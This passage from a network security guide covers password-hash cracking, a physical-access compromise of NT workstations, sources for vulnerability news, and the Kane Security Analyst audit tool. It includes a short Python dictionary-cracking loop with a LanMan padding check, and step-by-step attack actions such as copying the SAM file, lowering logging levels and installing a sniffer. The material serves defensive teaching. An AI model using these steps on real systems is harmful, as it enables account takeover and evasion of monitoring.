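Two of the shortcuts described above are easy to demonstrate. The sketch below is my illustration, not L0phtCrack itself: the first function applies the LanMan padding test behind the <8 column, and the second runs a dictionary pass the same way a cracker would, hashing each candidate and comparing. MD5 stands in for the real LanMan/NT hash algorithms purely to show the guess-hash-compare loop, and the first hash value and the wordlist path are invented for the example.

import hashlib

LM_PAD = "AAD3B435B51404EE"

def shorter_than_eight(lm_hash):
    # The second half of a LanMan hash is this constant padding
    # whenever the password is fewer than eight characters.
    return lm_hash.upper().endswith(LM_PAD)

def dictionary_attack(target_hash, wordlist_path, hash_func=hashlib.md5):
    with open(wordlist_path) as wordlist:
        for word in wordlist:
            word = word.strip()
            if hash_func(word.encode()).hexdigest() == target_hash:
                return word
    return None

print(shorter_than_eight("0123456789ABCDEFAAD3B435B51404EE"))  # True: a short password
print(dictionary_attack("5f4dcc3b5aa765d61d8327deb882cf99", "words.txt"))

The second target value is the MD5 of the word password, so any wordlist containing that word produces a hit almost instantly, which mirrors the sub-10-second dictionary pass described above.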
Physical Access Attacks

With all the attention given to network-based attacks, many people forget that the most straightforward way to compromise a network is to gain physical access to one or more network systems. Systems that are kept in secluded or locked areas are the most vulnerable, as such areas provide the attacker with the privacy needed to compromise a system. As I have emphasized, an overwhelming majority of attacks originate from within an organization, which provides an attacker with a certain level of legitimate access to network resources. With physical access to a system, it is not very difficult to increase this access to that of an administrator.

For example, let's assume that you have an NT workstation environment for all of your client systems. Profiles are mandatory, and users are provided with minimal access to both the local system and network resources. All service packs have been installed, as have all security hotfixes. Every NT workstation has full auditing enabled, so that every event is recorded and sent off to a remote process that looks for suspicious activity and archives the logs for future review.

This certainly sounds like a secure client environment, doesn't it? If Woolly Attacker has private physical access to the machine, he can easily perform the following steps:
• Pop the cover on the computer and disconnect the battery in order to clear the CMOS password.
• Boot the system off a floppy in order to gain access to the local file system.
• Copy the SAM file so that password information can be run through a password cracker.
• Remove the local administrator password so that he has full access to the local NT operating system.
• Reboot the system with the NIC disconnected so that he can log on locally as administrator without tripping any alarms.
• Change the logging level so that suspicious activity is not reported.
• Install sniffing software so that other network communications can be monitored.
• Use the compromised passwords in order to attack other network systems.

In short, a savvy attacker can completely circumvent the security of this environment in less than half an hour; the greatest delays would be in waiting for NT to boot or shut down. If you are managing security for a large environment, you should not plan on being able to fully secure any of your client systems. As you can see from this scenario, they are far too easy to compromise.

Note
The exception would be a thin client environment such as WinFrame or MetaFrame. This is because the local workstations are little more than terminals; all security is managed on the server itself.

Summary

In this chapter we discussed some of the ways an attacker might go about attacking your network. We started by looking at the ways an attacker can collect information about your network with little more than your organization's name. We then discussed how an attacker could go about collecting even more information about your specific network environment in order to determine what vulnerabilities may be exploitable. Finally, we looked at some of the assault methods available to an attacker who wishes to compromise your resources.

In the next chapter, we will discuss how to stay ahead of these attacks. We will look at how to stay informed of the exploits that have been found—and how to find your vulnerabilities before an attacker does.

Chapter 17: Staying Ahead of Attacks

Thanks to the complexities of modern software, it is safe to say that security vulnerabilities will be with us for many years to come.
While public discussion of those vulnerabilities goes a long way toward insuring that current software is purged of exploitable code, it makes no guarantee that future releases will be free from the same problems. For example, buffer overflows have plagued programmers since the early '70s and are still very much a problem today.

In order to maintain a secure environment, you need to stay abreast of these exploits as they are discovered. Gone are the days when you could wait for a product upgrade or a service pack in order to fix a security problem. For example, Microsoft releases security-related hotfixes constantly. Clearly, you would not want to leave security holes open simply because you were waiting for a patch from a vendor.

Information from the Vendor

Vendor channels are your best bet for finding the latest security patches. Still, while most vendors will also issue security advisories, you can usually find out about specific exploits much sooner through third-party sources. You are also far more likely to get an accurate description of the exploit that is free from marketing spin. For example, a Microsoft press release regarding Back Orifice (a famous Trojan horse) stated:

"Back Orifice" does not expose or exploit any security issue in Windows, Windows NT, or the Microsoft BackOffice suite of products. As far as demonstrating an inherent security vulnerability in the Windows platform, this is simply not true.

Obviously, this is great public relations spin, but it is not very helpful to the system administrator who is trying to determine how much of a threat this vulnerability poses to her local networking environment. So, while the vendor may be willing to tell you that the vulnerability exists, you might have to look elsewhere for the full scoop.

3COM

3COM makes a wide variety of networking products, including network cards, switches, and routers. The company also has a popular handheld computer line called the Palm. 3COM has made a name for itself by supplying reasonably priced products that provide above-average performance. The 3COM Web site can be found at www.3com.com.

Technical Information

The 3COM Web site contains a wealth of technical papers and briefs. While the inventory is not quite as extensive as the one maintained by Cisco, the 3COM site has papers on topics ranging from ATM to network management to security. Some of these papers are product specific; for example, one of the security papers specifically deals with using a 3COM NetBuilder as a firewall. There are many papers, however, that simply deal with a specific technology. These papers can be found through the link www.3com.com/technology/tech_net/white_papers/index.html.

You can also find a decent amount of product support on 3COM's Web site. There is no publicly accessible knowledge base, but there are support tips and release notes for each of its products. Product documentation is also available online.

Note
In order to get access to 3COM's knowledge base, you must purchase a support contract. This gives you access to a wider range of problems, such as known bugs.

The generic support can be found at http://infodeli.3com.com/index.htm.

3COM has improved over the past few years at issuing security advisories for its products. This is in sharp contrast to its earlier record.
Unfortunately, 3COM does not have a mailing list dedicated to security issues, something other vendors have implemented to improve timely notification of product vulnerabilities.

Patches and Updates

3COM makes patches and updates available free to all its customers; you do not need a service contract simply to receive patch updates and fix known bugs. There is also some helpful third-party software on 3COM's support site, such as a Windows-based TFTP server. A TFTP server is required if you wish to update the firmware on a 3COM router or switch. You can access 3COM patch files through the software library at http://support.3com.com/infodeli/swlib/index.htm.

Cisco

Cisco specializes in infrastructure hardware. It has a diverse product line, which includes switches, routers, firewalls, and even intrusion detection systems. Seeing as most of the Internet runs on Cisco hardware, Cisco is obviously a major player in the network connectivity field. You can find the Cisco Web site at www.cisco.com.

Technical Information

Cisco provides one of the best sites on the Internet if you are looking for network-related advice. Along with product-specific documentation, there is a wealth of technology information. Looking to implement BGP or OSPF in your environment? The Cisco site contains a number of white papers, as well as tutorials, that explain the technology and how to implement it.

The Cisco Web site has a large number of security-related documents geared toward helping the network administrator lock down his environment. You can perform a search on just about any vulnerability (such as teardrop, Smurf, and so on) to receive information that describes the exploit and what you can do to protect your internal systems. To make life even easier, all documents can be retrieved directly from the search engine on the main page.

Cisco does an excellent job of publicizing vulnerabilities once they are discovered and resolved. Cisco announces these patches through CERT, as well as through its own distribution channels. As a major Internet player, Cisco has set the standard for commercial vendors in acknowledging vulnerabilities when they are found and issuing patches in a timely manner.

Patches and Updates

If Cisco falls short in any area, it would have to be in making new patches publicly available. Cisco does not issue hotfixes in order to patch its routers or switches. Rather, the company releases a new revision of the device's operating system. Because these updates may include product enhancements as well, Cisco does not make them available via publicly accessible areas such as its Web or FTP sites. You need to have a Cisco support contract to receive these updates.

To its credit, Cisco will provide free updates when a major security hole is found. For example, when it was found that the Cisco 700 series routers were vulnerable to a buffer overflow attack if a user entered an extremely long password string, Cisco made updates freely available to all Cisco 700 series customers, regardless of whether or not the customer had a support contract.
\nLinux \nWhile the core Linux operating system is not considered a commercial product, it is actively produced and \nsupported by a large number of volunteers, as well as the different organizations that distribute it. Linux has \nestablished itself as a robust operating system that is capable of handling mission-critical operations. It can act as \nan application server, a router, or even a firewall. Most Linux-related information is linked to the main Web site at \nwww.linux.org. \nTechnical Information \nThe Linux Web site is host to a plethora of documents created by the Linux Documentation Project (LDP). There \nare FAQs, HOWTOs, and mini-HOWTOs on literally every function or service supported by Linux. No matter \nwhat you are trying to do with your Linux operating system, chances are there is documentation to walk you \nthrough the process. These documents even include many of the caveats you need to watch out for while \nperforming your installation. Links to documentation can be found at www.linux.org/docs/index.html. \nThis page even includes links to many Linux-related mailing lists and newsgroups. The list is literally too \nextensive to include in this chapter. Mailing lists provide an excellent way to get real-time help when a Linux \nproblem has you completely stumped. If phone support is more to your liking, a number of vendors will provide \nthis service for a fee. A list of vendors can be found at www.linux.org/vendors/index.html. \nThe Linux development team actively propagates security-related vulnerabilities and patch information as these \nare discovered. This information is circulated through CERT and through a number of Linux discussion channels. \nThe team is also extremely responsive in issuing patches. \nPatches and Updates \nAs a noncommercial operating system, Linux can be received free of charge. This is also true for security-related \npatches and fixes. There are a number of locations where Linux source code can be downloaded. Some of the \nmore popular include \nƒ \nftp://ftp.cc.gatech.edu/pub/linux/ \nƒ \nftp://sunsite.unc.edu \nƒ \nftp://ftp.caldera.com/pub/ \nƒ \nftp://ftp.redhat.com/redhat \nMicrosoft \nMicrosoft has come under heavy fire over the last few years for the large number of security vulnerabilities found \nin its software products. While Microsoft was initially somewhat unresponsive when security exploits were \nidentified, the company has picked up the pace recently. It is not uncommon for Microsoft to release a security \npatch within hours of the vulnerability’s being reported. You will find the Microsoft Web site at \nwww.microsoft.com. \n" }, { "page_number": 355, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 355\nTechnical Information \nWhile Microsoft’s Web site contains an acceptable amount of technical information, most of it is labeled \n“premium content.” While there is no charge for accessing premium content, you are forced to fill out a marketing \nquestionnaire and configure your browser to accept cookies. The questionnaire requires the typical information: \nwho you are, where you work, and what your e-mail address is. You are also prompted to accept future e-mails \nfrom Microsoft, which contain marketing and promotional information. \nThe requirement that your browser must accept cookies is probably the biggest problem. A cookie is a text file, \nwhich is saved to your local system, that allows a Web site to identify who you are and where you have been. 
\nPredominantly, this is used by companies like Double-Click.net in order to determine which banner ads have \nproved to be most effective against you in the past. What is really frightening is that cookies can be used to track \nyour movements throughout the Internet and document which Web sites you have visited. You can read the first \ncookie specification at www.netscape.com/newsref/std/cookie_spec.html. \nIf you do not have your browser configured to accept cookies, you will be faced with the error screen shown in \nFigure 17.1. Notice that Microsoft also uses this opportunity to try to get you to use its own browser. \nMicrosoft does post security-related bulletins to its Web site. These alerts can be found at \nwww.microsoft.com/security/. \n \nFigure 17.1: You must accept cookies before viewing technical documents. \nPatches and Updates \nMicrosoft makes all security fixes freely available via its Web site. Microsoft has also made their updates known \nthrough the Critical Update Notification program. This utility runs in the background on Windows systems and \nperiodically connects to Microsoft’s network to determine if there is any recently released patches. The user is \nnotified and given the opportunity to download any fixes as soon as they are released. As mentioned earlier in this \nsection, Microsoft has become extremely responsive in issuing security-related patches. These patches can be \nretrieved from the FTP site ftp://ftp.microsoft.com. \nNovell \nNovell makes a wide range of networking products that are focused on its NetWare operating system. Novell has a \npretty good track record with regard to security. Novell’s Web site is located at www.novell.com. \nTechnical Information \nThe Novell Web site contains a number of white papers; however, all are specific to Novell product offerings. \nThere is very little general information if you are looking to find out about a specific technology. Novell offers a \ndocumentation site that contains online manuals for its product offerings. The documentation site is located at \nwww.novell.com/documentation. \nNovell also maintains a knowledge base that you can search in order to find resolutions to known problems. The \nknowledge base is extensive and documents support calls handled by Novell’s technical support staff. Here you \ncan find answers to just about any Novell-related issue. The problem is that the search engine does not do a very \ngood job of helping you locate documents. For example, entering the phrase security AND alert brings up \nproduct information on WordPerfect, NetWare Connect, and NetView as the closest matches. These documents \nare not exactly what you may be looking for if you are searching to find out about any recent vulnerabilities. You \ncan find the Novell support site at http://support.novell.com. \nNote \nNovell does not participate in CERT advisories and does not dedicate space on its Web \nsite to announcing security-related problems. You may be able to find security issues \nwithin the knowledge base, but you must already know what you are looking for in order \nto find it. This means that you must rely completely on third-party channels for \nvulnerability information regarding NetWare products. \n" }, { "page_number": 356, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 356\nPatches and Updates \nNovell makes all patch updates freely available through its support Web site. 
There is even a file find utility that allows you to see whether a patch update is available for a specific file. You can also view Novell's suggested minimum patches and download them from the same page. Finally, recent patches can all be viewed from a single page, so you can quickly find the latest upgrades.

Sun Microsystems

Sun manufactures one of the most popular lines of UNIX operating systems. These boxes have found homes as engineering workstations and high-end application servers. Sun is known for pushing the performance envelope with its UltraSPARC product line, which is already using 64-bit processors running at speeds of 900MHz.

Technical Information

Sun has made a tremendous improvement to its support infrastructure, and most patches and support information can be found (for free) on its Web site, www.sun.com. This is in sharp contrast to several years ago, when even patches had to be purchased.

Note
Sun also actively participates in CERT advisories and has posted a number of vendor bulletins.

Sun also maintains a section of its Web site for updating clients on security-related information. This page can be accessed through the link http://sunsolve.sun.com/pub-cgi/show.pl?target=security/sec.

Third-Party Channels

There are a number of third-party resources you can use in order to stay informed of the latest security-related exploits. Typically, these resources are established by helpful netizens or organizations that specialize in network security. All of the resources listed here are free, meaning that there is no entry fee required in order to access security-related information. Some resources do post advertisements, however, in order to defray the cost of maintaining the resource.

Third-party security resources include vulnerability databases, Web sites, mailing lists, and newsgroups. Each has its own drawbacks and benefits:

Vulnerability database Provides search capability for finding exploits but no feedback if you have additional questions

Web site May have direct links to patch information, as well as a more detailed description, but you will have a harder time finding a specific exploit

Mailing list Provides immediate notification of exploits as they are found, but some lists can bury your mailbox with 50+ messages a day

Newsgroup Offers more detailed discussions regarding specific exploits, but you may have to sift through lots of messages to find the information you are looking for

Tip
Generally, it is best to subscribe to only one or two mailing lists in order to be informed of exploits as they are found. You can then use the vulnerability databases and Web sites when you wish to research a specific issue.

Vulnerability Databases

Vulnerability databases allow you to search for an exploit based on specific criteria. For example, you may be able to search for exploits that affect a specific operating system (NT, Linux, and so on), meet a specific attack signature (denial of service, cracking, and so on), or even exploits that have been discovered over a specific range of dates.

ISS's X-Force Database

Internet Security Systems' X-Force database can be searched by platform or by keyword. There are seven different flavors of UNIX to choose from, depending on your taste, as well as all Windows operating systems, which are grouped into a single category.
The database only lists operating system exploits; there are no entries for networking hardware such as 3COM or Cisco devices. You can choose to display a month's worth of exploits or all entries for a specific platform. You can also choose to have hits displayed with a short summary or all on one page.

A unique feature of the X-Force database is that each entry is assigned a level of risk. If your query produces multiple entries, you can quickly scan through the list in order to find the worst of the bunch. The database entries are sufficiently descriptive, although not always 100 percent accurate. For example, if you look up the Exchange exploit, which we discussed in the last chapter, the record states:

This action will cause the Exchange Server to crash. This attack does not result in loss of data or unauthorized access to data held in Exchange Server. The Exchange Server could also be vulnerable to stack overwriting attempts by allowing an attacker to insert code as part of the address and have it executed.

As you can see, there are some inconsistencies in this entry. If the exploit causes the server to crash, at a minimum you are going to lose any data that is still in RAM and has not yet been written to disk. The record also contradicts itself by first stating that this exploit cannot be used for unauthorized access, but then going on to say that it could be used to execute code. The X-Force database can be found at http://xforce.iss.net.

Packet Storm

Packet Storm bills itself as "the largest and most updated library of information security information in the world." It is indeed one of the most comprehensive search and reporting engines on all aspects of information security, covering not just the weaknesses of a given system but also, through its news service, the latest happenings in the information security realm.

Packet Storm provides a unique feature called Storm Watch, which reports on the topics searched most often in its database. A printout of the top 20 searches is shown in Table 17.1. Packet Storm can be found at http://packetstorm.securify.com/.

Table 17.1: Top 20 Requested Areas of Security Interest

Query                        Date
apache                       Sun Feb 18 10:52:22 PST 2001
named                        Sun Feb 18 10:52:20 PST 2001
firewall software windows    Sun Feb 18 10:52:18 PST 2001
linux 2.0.35                 Sun Feb 18 10:52:18 PST 2001
ssi exec                     Sun Feb 18 10:52:15 PST 2001
pimp.c                       Sun Feb 18 10:52:13 PST 2001
unix keylogger               Sun Feb 18 10:52:05 PST 2001
epmap                        Sun Feb 18 10:52:04 PST 2001
proftpd 1.2.0pre2            Sun Feb 18 10:52:03 PST 2001
exec cmd                     Sun Feb 18 10:52:01 PST 2001
NT 4.0                       Sun Feb 18 10:51:49 PST 2001
apache exploit               Sun Feb 18 10:51:48 PST 2001
root shell                   Sun Feb 18 10:51:28 PST 2001
mail                         Sun Feb 18 10:51:25 PST 2001
uin sniffer                  Sun Feb 18 10:51:24 PST 2001
windows 98                   Sun Feb 18 10:51:23 PST 2001
php                          Sun Feb 18 10:51:12 PST 2001
+apache +exploit             Sun Feb 18 10:51:10 PST 2001
solaris                      Sun Feb 18 10:51:08 PST 2001
windows 98                   Sun Feb 18 10:51:08 PST 2001

Security Bugware

More of a listing than a true database, the Security Bugware site probably contains the most complete listing of exploits and vulnerabilities of any site on the Internet. The amount of information is staggering.
The Windows section alone contains more than 250 entries. Some of these are somewhat repetitive; for example, there are five entries for Ping, but three of them are different implementations of the Ping of death. This repetition is actually a good thing, because it gives you a more complete picture of how a vulnerability can be exploited.

There is no search capability for the entries. You must select one of 12 operating system categories and wade through the results. The entries are listed in alphabetical order, so searching the page is not too difficult. You can also use your Web browser's Find function for some limited searching within a page.

Note
The vulnerability listings are also diverse in terms of the products covered. Not only are the major operating systems listed; you can also find vulnerability entries for networking hardware and network applications. If you link to only a single vulnerability database, this is the one to pick.

The site can be accessed through the URL http://161.53.42.3/~crv/security/bugs/list.html.

Web Sites
Third-party Web sites can contain a wealth of information about all forms of security-related issues. There are sites that can give you pointers on securing your environment, as well as sites that provide the same tools an attacker would use against your network. There are obviously too many security-related sites to list them all here, so I have chosen a few of my favorites.

AntiOnline
AntiOnline is one of those sites with a little bit of everything. The main page has a listing of current news events that pertain to network security. There is also a “Quick Tips” section, which provides some excellent hints on dealing with some of the day-to-day security issues a network administrator faces, such as tracking spoofed addresses or dealing with spam. Another link brings you to an online library with papers on a wide range of security topics. There is even a file archive containing a large number of security tools, both positive and negative in functionality. You can access AntiOnline at www.antionline.com/.

The CERT Home Page
The Computer Emergency Response Team (CERT) maintains this site, collecting reports of Internet-based exploits and working with vendors to get vulnerabilities resolved. CERT also issues public bulletins on known vulnerabilities.

Note
While CERT primarily focuses on UNIX vulnerabilities, it does issue Windows bulletins, as well.

The site also contains helpful pointers for securing your environment. The URL for CERT is www.cert.org/.

Guide to (Mostly) Harmless Hacking
Despite its name, this is actually a very useful (although a little dated) site if you are looking to protect yourself against attack. While there are many examples of how to launch attacks, there are just as many that discuss how to prevent them. There are even some helpful tips on writing shell scripts and batch files. All examples assume that the reader has very little computer experience, making the tutorials easy to follow. The guide can be found at www.spaziopiu.it/elettrici/gtmhh/.

L0pht and @stake
L0pht started out as a group of hackers working out of the Boston area who specialized in system security and cryptography. Their site was a wealth of security-related information, including advisories and tools.
Some of the best-known vulnerabilities were discovered in L0pht's test lab, which means that most of L0pht's advisories are based on firsthand information.

In January of 2000, L0pht joined a newly formed company called @stake (created by former executives of Compaq, Forrester Research, and Cambridge Technology Partners). Because the former members of L0pht now run the research lab at @stake, the Web site continues to be one of the best sources of security advisories. Many of the tools pioneered by L0pht (like L0phtcrack and Antisniff) are now distributed by Security Software Technologies and can be found at www.securitysoftwaretech.com/.

Newer tools developed by the research lab are hosted on the @stake site itself. The entire research lab can be found at www.atstake.com/research/index.html.

The National Security Institute
The National Security Institute (NSI) home page goes beyond the network and publishes security-related information on a variety of topics. Along with computer security, the site covers personal security, terrorism, security legislation, and even travel advisories. The information on the site is extremely diverse; you can even read papers on the psychological effects of implementing an information security policy. This site is an excellent resource if you are looking to expand your knowledge of the security field. The NSI home page can be accessed at http://nsi.org/.

Phrack Magazine Home Page
Phrack magazine is one of the longest-running electronic periodicals dealing with system vulnerabilities. Quite a few exploits have been made known to the public through the pages of Phrack. While most of the articles are written from the perspective of how to perform an exploit, they do an excellent job of describing all the gory details of why an exploit is effective. This is just the information you need in order to insure that you do not fall prey to attack. Phrack is not published on any set schedule; the most recent issue, #56, was released in May of 2000. Phrack does not have its own Web site, but archives can be found at http://packetstorm.securify.com/mag/phrack/.

Robert Malmgren's NT Security FAQ
As the name implies, this site is NT specific (no Windows 2000 information), but it contains everything you would ever want to know about securing an NT server. Every aspect of an NT server is covered in great detail, including account administration, the Registry, and the file system. There is even a section on NT-compatible firewall and authentication options. If you need to secure an NT server, this site is well worth the visit. The NT Security FAQ can be accessed at www.it.kth.se/~rom/ntsec.html.

Mailing Lists
Mailing lists are an extremely useful tool for staying informed of security vulnerabilities. They provide you with immediate notification when vulnerabilities are released to the public. They also supply a forum where the fine points of a particular exploit can be discussed in detail. A mailing list can provide you with far more information regarding a specific exploit than a vulnerability database, because most mailing lists are interactive. If the list is an open forum, you are free to ask questions.

Note
To join a mailing list, you must send an e-mail message to the mailing list server. This message must include some form of keyword or words in the body of the message (not the subject line), such as subscribe. To be removed from a list, you typically repeat the process using the word unsubscribe.
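Because the subscribe message is just ordinary e-mail, the process is easy to automate. Here is a minimal sketch using Python's standard smtplib module; every address and the list name below are hypothetical placeholders, and the exact keyword expected in the body varies from list to list (check each list's own instructions):

    import smtplib
    from email.message import EmailMessage

    msg = EmailMessage()
    msg["From"] = "admin@mycompany.example"      # your own address
    msg["To"] = "majordomo@lists.example.com"    # the list server
    # The keyword goes in the message body, not the subject line.
    msg.set_content("subscribe security-alerts")

    # Hand the message to your local mail server for delivery.
    with smtplib.SMTP("mail.mycompany.example") as server:
        server.send_message(msg)

Sending the same message with unsubscribe in the body removes you from most lists.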
Bugtraq
The mother of all vulnerability discussion lists, Bugtraq is a moderated mailing list for the discussion of exploits. Many vulnerabilities are announced publicly for the first time on this list. The mailing list focuses on what exploits have been found, as well as what can be done to fix them. This is the one list you can subscribe to that will guarantee that you hear about any exploits that are discovered. While traffic volume is a bit high, the information collected through this list is well worth the price of hitting your Delete key a few extra times a day.

Security Focus hosts the Bugtraq archive and the subscription form at www.securityfocus.com/about/feedback/subscribe.html.

Firewall-Wizards
The Firewall-Wizards mailing list is for the discussion of all topics related to firewalls and perimeter security. The list is moderated by Marcus Ranum, who helps to insure that all posts stay on topic and that all spam is filtered. Traffic levels tend to be fairly low, with peaks when something exciting is going on within the firewall industry. The list has some extremely knowledgeable members, making it a great place to pick up firewalling tips.

To get more details and to join the list, go to www.nfr.com/mailman/listinfo/firewall-wizards.

InfoSec News
The InfoSec News mailing list disseminates security-related news articles, including excerpts from newspapers, magazines, and online references. The mailing list is closed, meaning that only the moderator is allowed to post. You can, however, contribute by sending the moderator security-related news articles. The list does not discuss vulnerabilities so much as what is going on in the security field. For details on how to join the list, go to www.c4i.org/isn.html.

ISS's X-Force IDS Discussion List
ISS hosts a number of discussion lists under the X-Force branch of its Web site; one of the more popular is the intrusion detection system mailing list. This is an unmoderated list with a focus on any topic related to intrusion detection systems. The list is an open discussion forum, meaning that anyone is free to post questions or comments. To join the list, point your browser to http://xforce.iss.net/maillists/.

The NTBugtraq Mailing List
The NTBugtraq mailing list focuses solely on Microsoft Windows exploits and vulnerabilities. Despite the list's name, it discusses all Microsoft operating systems and applications. The list is very heavily moderated, keeping postings to an absolute minimum. In fact, most of the postings originate from the list moderator or from the Microsoft programming staff. If you are strictly interested in Windows, this may be a good list to join.

Note
Windows-related vulnerabilities that originate on the Bugtraq mailing list eventually find their way to this list, as well.

For more NTBugtraq information and to join the list, go to www.ntbugtraq.com.

Newsgroups
If newsgroups are more your style, there are a number of groups that deal with security-related topics. Newsgroups are useful in that you do not have to worry about filling up your Inbox; messages are posted to newsgroup servers, which you can review at your leisure. The only problem with newsgroups is that they tend to have a very low signal-to-noise ratio, because newsgroup forums are unmoderated.

Note
A low signal-to-noise ratio means that you may have to filter through a lot of postings in order to find the information that interests you.
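Because newsgroups ride on the open NNTP protocol, you do not even need a full news reader to skim a group such as comp.security.firewalls. The following is a minimal sketch using Python's standard nntplib module; the server name is a placeholder for whatever NNTP host your ISP provides:

    import nntplib

    # Hypothetical news server; substitute your ISP's NNTP host.
    with nntplib.NNTP("news.example.com") as news:
        # Select the group; this reports how many articles it holds.
        resp, count, first, last, name = news.group("comp.security.firewalls")
        print(f"{name}: {count} articles available")

        # Skim the subject lines of the 20 most recent postings.
        start = max(first, last - 19)
        resp, overviews = news.over((start, last))
        for number, fields in overviews:
            print(number, fields["subject"])

Skimming subject lines this way makes it much easier to decide which discussions are worth reading in full.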
I have listed some newsgroups that may be of interest here, but I have not included a complete description, because the newsgroup name is typically descriptive:

• comp.os.ms-windows.nt.admin.security
• comp.os.netware.security
• comp.security
• comp.security.firewalls
• comp.security.ssh
• comp.security.unix
• comp.security.misc
• microsoft.public.access.security

Auditing Your Environment
The task of securing a network environment can be daunting, especially if you have multiple servers to deal with. It can be tough enough to handle the day-to-day firefighting, let alone figure out how to best lock down your systems. For the network administrator with many jobs to do, security can get put on the back burner in order to free time for other activities.

Many times the problem is not knowing what to look for. Most network administrators can change settings or load patches as required, but it would be nice to have some guidance about what needs to be done. The most obvious option is to hire a security consultant; however, this may be beyond your budget.

If you need to fix exploits, the vulnerability scanners covered in Chapter 16 are a good place to start. Products from Internet Security Systems (ISS) and WebTrends do an excellent job of documenting known exploits. Sometimes, however, what you are looking for is some guidance on how to create a more secure computing environment. When this is the case, consider using a security auditing program.

A security auditing package does not look for bugs or known vulnerabilities. Rather, it allows you to verify that all systems on your network comply with your security policy. For example, if your policy states that all user accounts should be forced to change their passwords every 90 days, an auditing package will check each of your servers in order to verify that this is the case.

Kane Security Analyst
Intrusion Detection's Kane Security Analyst (KSA) is a server auditing package. It does not perform vulnerability checks, but it will assess the security policy compliance level of each of your servers. KSA is capable of auditing Windows NT, NetWare (both bindery and NDS), UNIX, and even Lotus Notes servers. As part of KSA's assessment, it will check user accounts, the file system, logging, and even the Registry on NT/2000 systems. You enter the criteria for your organization's security policy, and KSA reports which network servers are noncompliant.

As an example, we will take a look at KSA's auditing ability when dealing with Windows 2000.

Note
The auditing process and reports generated against Windows NT/2000 are similar to those for each of the other platforms. The only big difference with Windows NT/2000 is that KSA can check Registry permissions and verify which drives are using NTFS.

You can download the latest 30-day evaluation copy of KSA from www.intrusion.com.
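To see what a compliance check boils down to, consider the 90-day password example above. On a Windows system, the standard net accounts command reports the machine's account policy, and a few lines of script can compare that output against the policy value. This is only an illustrative sketch, not how KSA itself is implemented; note that the exact label text in the command's output can vary between Windows versions and locales:

    import subprocess

    MAX_PASSWORD_AGE_DAYS = 90  # the value our written policy requires

    # "net accounts" prints the local account policy, one
    # "Label: value" pair per line.
    output = subprocess.run(
        ["net", "accounts"], capture_output=True, text=True, check=True
    ).stdout

    for line in output.splitlines():
        if line.lower().startswith("maximum password age"):
            value = line.split(":")[1].strip()  # e.g. "42" or "Unlimited"
            ok = value.isdigit() and int(value) <= MAX_PASSWORD_AGE_DAYS
            print("Maximum password age =", value,
                  "(compliant)" if ok else "(NOT compliant)")

A commercial auditing package performs hundreds of checks like this one, across many machines, and rolls the results up into a report.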
Installing KSA
The KSA installation could not be simpler. Download the latest version from KSA's Web site, run the self-extracting executable (pointing the contents to a temporary directory), and run the setup.exe file. After it prompts you for a directory location, the Setup program will install all the required files. If you decide later to remove KSA, you can do so by clicking the Add/Remove Programs icon within Control Panel.

Note
KSA must be run from a Windows NT server or workstation, version 3.51 or higher. While the program will successfully install on Windows 95/98, it will not run there.

You can install the software on any NT/2000 system and audit servers remotely; you do not need to install the software on every system. Once the software installation is complete, simply go to the Kane Security Analyst program group and click the Kane Security Analyst icon.

Using KSA
The KSA main screen is shown in Figure 17.2. In order to perform a compliance audit, you need to follow three simple steps:

1. Set a security standard.
2. Run a security audit.
3. Display the analysis of the security audit.

Figure 17.2: The KSA main screen

Each of these steps corresponds to a numbered button along the bottom of the screen. The fourth button can be used to review compliance history. Once an audit has been performed, you can quickly view a single portion of the audit using the icons at the top of the screen. This allows you to home in on a specific portion of the audit.

Defining a Security Policy
In order to input your security policy, click the Set Security Standard button. This produces the screen shown in Figure 17.3. The buttons along the left side of the screen allow you to select different aspects of your security policy. For example, Account Restrictions is selected by default. This button allows you to define whether KSA should check to see if station and time restrictions are being used. You can also tell KSA to check for disabled or dormant accounts.

Figure 17.3: Setting security policy account restrictions

Along the top of the screen are tabs labeled for different operating systems. Each tab allows you to select parameters for the applicable operating systems on your network. (You must purchase additional licenses in order to activate these tabs.) The buttons on the left and the tabs at the top allow you to navigate through all the audit parameters. For example, selecting System Monitoring along with the NetWare 4 tab will allow you to set which logging options should be checked on all of your NetWare 4.x servers.

Performing an Audit
In order to run an audit, select the Run Security Audit button from the KSA main screen. This will produce the Run Security Audit window shown in Figure 17.4. From this screen you tell KSA whether you wish to update a previous audit or perform a new one from scratch. You must also select which systems or domain you would like to have checked during the audit.

Figure 17.4: The Run Security Audit window

The Schedule button allows you to run the audit unattended at a specified time. This is useful if you would prefer to have the audit run during off hours or on the weekend, but you do not want to be there in order to initiate it. You can even have the scheduler run the audit on a regular basis so that you can compare different audits to see if any of your policy settings have changed.
\nOnce you have selected the audit parameters, simply click the Start icon in the lower right portion of the screen. \nThe amount of time it takes to perform the audit will vary based on the speed of the machine performing the audit \nand how many systems you have instructed KSA to check. Once the audit is complete, you can review the results. \nReviewing the Audit Results \nYou can review a graphical summary of the audit results by selecting the Survey Risk Analysis button from the \nKSA main screen. This produces the Risk Analysis Survey window shown in Figure 17.5. As you can see, the \ngraphic does an excellent job of illustrating which portions of the system configuration meet your security policy \nguidelines and which ones do not. A score of 100 percent is full compliance. Anything less indicates that the \nsystem needs some tuning. You can use the percentage of compliance as a metric for determining where to focus \nyour attention first. \n" }, { "page_number": 364, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 364\n \nFigure 17.5: The Risk Analysis Survey window \nIf you select the System Monitoring button in the Risk Analysis Survey window, you can retrieve detailed \ninformation about why System Monitoring scored so poorly. This will produce the System Monitoring screen \nshown in Figure 17.6. DEFCON4 scored so poorly on the System Monitoring test because event logs and retention \ntime have been incorrectly configured. Since our policy stated that all servers should utilize these features, KSA \nhas flunked this system. If you look in the lower right corner of the figure, you will see that the Security Log Size \nis too small and that log entries are not being retained long enough. This information is extremely useful, because \nyou now know exactly what settings need to be modified in order to bring this system into compliance. \n \nFigure 17.6: The System Monitoring screen \nNow that we have run an audit, we can investigate some of the other KSA features. For example, clicking the \nRegistry Rights icon on the main KSA screen produces the Registry Rights window shown in Figure 17.7. From \nthis window you can browse the access rights assigned to each user or group. The left pane allows you to navigate \nthe Registry, while the right pane shows you who has been assigned access and what level of permissions has been \ngranted. The Add button allows you to flag this Registry key as a favorite. \n" }, { "page_number": 365, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 365\n \nFigure 17.7: The Registry Rights window \nIt can be extremely time-consuming to navigate the entire Registry tree in order to check permissions. Typically, \nthere are only a few Registry keys that you will want to check on a regular basis, such as the SAM key. The 